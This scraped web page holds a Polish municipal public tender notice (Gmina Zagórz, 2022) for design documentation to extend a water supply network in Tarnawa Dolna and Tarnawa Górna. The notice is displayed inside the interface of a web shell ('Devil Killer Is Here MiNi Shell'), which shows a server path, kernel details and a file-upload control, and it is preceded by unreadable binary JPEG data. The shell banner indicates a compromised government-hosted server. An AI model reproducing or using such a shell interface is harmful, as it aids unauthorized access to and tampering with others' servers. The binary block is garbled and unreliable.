JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220623/0022078901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Opracowanie dokumentacji projektowej rozbudowy istniejącej sieci wodociągowej na terenie Miasta i Gminy Zagórz” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ZAGÓRZ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440778</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 3 Maja 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zagórz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-540</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">134622062</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@zagorz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zagorz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Opracowanie dokumentacji projektowej rozbudowy istniejącej sieci wodociągowej na terenie Miasta i Gminy Zagórz” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6eae9cbd-f2cc-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00220789</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00040085/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Opracowanie dokumentacji projektowej rozbudowy sieci wodociągowej na terenie Gminy Zagórz</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://umig-zagorz.ires.pl/25185,25188,30327/30327/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie p.z.p., odbywa się przy użyciu środków<br/>komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w<br/>ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie<br/>podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w<br/>szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ<br/>składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>3. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>1) drogą elektroniczną: zp@zagorz.pl (nie dotyczy składania ofert);<br/>2) poprzez dedykowany formularz: „Formularz do komunikacji” udostępniony w systemie, dostępny pod adresem:<br/>https://miniportal.uzp.gov.pl;<br/>3) platformie usług administracji publicznej ePUAP: https://epuap.gov.pl/wps/portal<br/>4. Rejestracja na Platformie, w tym złożenie oferty w formie elektronicznej, wymaga posiadania konta na ePUAP.<br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>6. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>7. W celu korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika urządzeniem teleinformatycznym z<br/>dostępem do sieci Internet. Aplikacja działa na Platformie Windows, Mac i Linux.<br/>8. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych:<br/>1) specyfikacja połączenia - Formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>2) format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem UTF-8,<br/>3) oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane zapisywane są z<br/>dokładnością co do setnej części sekundy,<br/>4) integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP. W przypadku Wykonawcy<br/>wysyłającego wniosek do Zamawiającego, ESP Zamawiającego automatycznie generuje Rodzaj Urzędowego Poświadczenia<br/>Odbioru czyli Urzędowe Poświadczenie Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji<br/>„Dane poświadczenia” jest zawarta informacja o dacie doręczenia.<br/>9. System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/>1) Microsoft Internet Explorer od wersji 11.0<br/>2) Mozilla Firefox od wersji 15<br/>3) Google Chrome od wersji 20<br/>4) Microsoft Edge<br/>10. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB<br/>11. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>Pozostałe postanowienia zostałe zawarte w rozdz. XIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Zagórz;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod<br/>adresem e-mail: iod@zagorz.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie podstawowym;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZP.271.16.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 pn. ,, Dokumentacja projektowa dla miejscowości Tarnawa Dolna oraz Tarnawa Górna”<br/>I.	Opracowanie dokumentacji projektowej wraz z uzyskaniem prawomocnego pozwolenia na budowę (lub zgłoszenia wykonania robót budowlanych) oraz pełnieniem nadzoru autorskiego dla inwestycji pn.: „Budowa sieci wodociągowej w miejscowościach Tarnawa Dolna i Tarnawa Górna” <br/>II.	Przedmiot zamówienia obejmuje w szczególności:<br/>1)	wykonanie dwóch kompletnych dokumentacji projektowych dla budowy sieci wodociągowej w miejscowościach Tarnawa Dolna i Tarnawa Górna. Zakres poszczególnych dokumentacji został przedstawiony na załączniku graficznym nr 1;<br/>2)	doprowadzenie wody do obszaru objętego inwestycją należy zaprojektować <br/>zgodnie z: <br/>a)	warunkami technicznymi wydanymi przez SPGK Sp. z o.o. w Sanoku znak ZWK.4411.2.15.2022 <br/>b)	dokumentem o nazwie „Wytyczne techniczne do projektowania i realizacji sieci, przyłączy oraz urządzeń wodociągowych i kanalizacyjnych” dostępnym na stronie internetowej SPGK Sp. z o.o. w Sanoku pod adresem https://zwk.spgk.com.pl/o-firmie/dokumenty-do-pobrania/<br/>3)	umożliwienie podłączenia do projektowanej sieci użytkowanych budynków mieszkalnych, usługowych, użyteczności publicznej (w m. Tarnawa Dolna są to Szkoła Podstawowa oraz Świetlica Wiejska, natomiast w m. Tarnawa Górna są to Ośrodek Zdrowia, Świetlica Wiejska, Dom Strażaka, Kościół Parafialny oraz budynek piekarni) oraz budynków będących w trakcie budowy.<br/>III.	Zamawiający informuje ponadto, że: <br/>1)	w ramach inwestycji może dojść do konieczności zaprojektowania zbiornika ppoż. oraz urządzenia do lokalnego podwyższania ciśnienia wody w formie hydroforni. Oba obiekty powinny być opracowane zgodnie z wytycznymi SPGK Sp. z o.o. w Sanoku. Zamawiający informuje, że obiekt hydroforni wody powinien być opracowany jako wolnostojący budynek wykonany w technologii tradycyjnej, tj. murowany z dachem czterospadowym wraz z dociepleniem ścian. Obiekty muszą być także ogrodzone oraz mieć zapewniony dojazd. Wobec powyższego Wykonawca w ramach zaoferowanej ceny musi przewidzieć wynagrodzenie dla poszczególnych branżystów (architekt, konstruktor, elektryk, drogowiec itp.). <br/>2)	dokonał rozeznania chęci korzystania z nowo projektowanej infrastruktury wśród właścicieli nieruchomości obu miejscowości, z którego wynika, że zamierza z niej korzystać 94 nieruchomości zlokalizowanych w m. Tarnawa Dolna oraz 82 nieruchomości w m. Tarnawa Górna. Przewiduje się, że łączna liczba odbiorców w obu miejscowościach wynosić będzie ok. 513 osób,<br/>3)	zaproponowane rozwiązania muszą uwzględniać dalszą rozbudowę sieci wodociągowej na terenie Gminy Zagórz, zapewnić ekonomiczną realizację oraz eksploatację sieci wodociągowej,<br/>4)	dokumentacja projektowa sieci będzie wymagała w szczególności sporządzenia opracowań dla przekroczeń drogi wojewódzkiej oraz powiatowej, torów kolejowych (tereny zamknięte PKP), rzeki Osława oraz potoku Tarnawka, wobec czego Wykonawca w ramach oferowanej ceny powinien uwzględnić koszty ich opracowania.<br/>IV.	Zakres zamówienia obejmował będzie sporządzenie dwóch odrębnych dokumentacji dla każdej z inwestycji obejmującej: <br/>1)	sporządzenie kompletnego wniosku oraz uzyskanie decyzji o środowiskowych uwarunkowaniach realizacji inwestycji celu publicznego;<br/>2)	sporządzenie kompletnego wniosku oraz uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego wraz z wymaganymi załącznikami;<br/>3)	aktualizację map do celów projektowych;<br/>4)	uzyskanie na rzecz Zamawiającego prawa do dysponowania nieruchomościami na cele budowlane oraz zgody dla przetwarzania danych osobowych od właścicieli, przez których nieruchomości będzie przebiegać planowana inwestycja; <br/>5)	uzyskanie wszelkich przewidzianych prawem uzgodnień i decyzji administracyjnych niezbędnych do prawidłowej realizacji zadania;<br/>6)	opracowanie kompletnego projektu budowlanego sieci wodociągowej opracowanego zgodnie z przepisami powszechnie obowiązującymi, a w szczególności Prawa budowlanego i spełniającego wymagania Rozporządzenia Ministra Rozwoju z dnia 11 września 2020r. w sprawie szczegółowego zakresu i formy projektu budowlanego (z uwzględnieniem ewentualnych nowelizacji ww. przepisów, które mogą nastąpić w toku realizacji umowy) – Projekt budowlany należy wykonać w ilości 5 egzemplarzy w formie papierowej oraz 1 egzemplarz w formie elektronicznej;<br/>7)	opracowanie kompletnego projektu wykonawczego, uszczegółowiającego projekt budowlanym, zgodnie z przepisami Rozporządzenia Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (z uwzględnieniem ewentualnych nowelizacji ww. przepisów, które mogą nastąpić w toku realizacji umowy) – Projekt wykonawczy należy wykonać w ilości 5 egzemplarzy w formie papierowej oraz 1 egzemplarz w formie elektronicznej;<br/>8)	opracowanie zbiorczego projektu przyłączy wodociągowych dla nieruchomości, których właściciele wyrazili chęć korzystania z projektowanej sieci wodociągowej – Zbiorczy projekt przyłączy należy wykonać w ilości 2 egzemplarzy <br/>w formie pisemnej oraz 1 egzemplarz w formie elektronicznej;<br/>9)	sporządzenie kosztorysu inwestorskiego, przedmiaru robót oraz specyfikacji technicznej wykonania i odbioru robót – Powyższe dokumenty należy wykonać w ilości po 2 egzemplarze w formie papierowej oraz po 1 egzemplarzu w formie elektronicznej edytowalnej;<br/>10)	pełnienie funkcji nadzoru autorskiego podczas realizacji inwestycji oraz w okresie rękojmi za wady dla robót budowlanych realizowanych na podstawie dokumentacji projektowej opracowanej przez Wykonawcę;<br/>11)	udziału w procedurze wyłonienia wykonawcy robót realizowanych w oparciu o ww. dokumentację projektową, w tym przygotowanie odpowiedzi na pytania Wykonawców robót, udzielania wyjaśnień dotyczących opracowanej dokumentacji projektowej oraz dokonywania ewentualnych modyfikacji (poprawek i uzupełnień) w opracowanej dokumentacji projektowej i przetargowej, w trakcie postępowania przetargowego na realizację robót budowlanych dla przedsięwzięcia polegającego na budowie przedmiotowego przedsięwzięcia; <br/>12)	zaprojektowana inwestycja spełniać ma wymogi dostępności wynikające z ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami, a w szczególności minimalne wymagania o których mowa w art. 6 ww. ustawy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert dla części 1, części 2 oraz części 3 :<br/>1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena ryczałtowa brutto (C) - waga kryterium 60%;<br/>2)	Doświadczenie Wykonawcy (W) - waga kryterium 40 %.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/><br/>1) Cena ryczałtowa brutto (C) - waga 60%<br/><br/>Cena najniższa brutto*<br/>C = ------------------------------------------------ x 60 pkt<br/> Cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>2)	Doświadczenie Wykonawcy (W) - waga 40%<br/><br/><br/><br/><br/>Ilość opracowań dokumentacji projektowych lub projektów budowlanych w zakresie rozwiązań dotyczących budowy, przebudowy, rozbudowy sieci wodociągowych.	Liczba punktów do uzyskania:<br/>3 opracowania	40 pkt<br/>2 opracowania	20 pkt<br/> 1 opracowanie 10 pkt<br/>0 opracowań	0 pkt<br/><br/>W kryterium ,,Doświadczenie Wykonawcy (W)” będzie oceniana ilość wykonanych przez Wykonawcę w 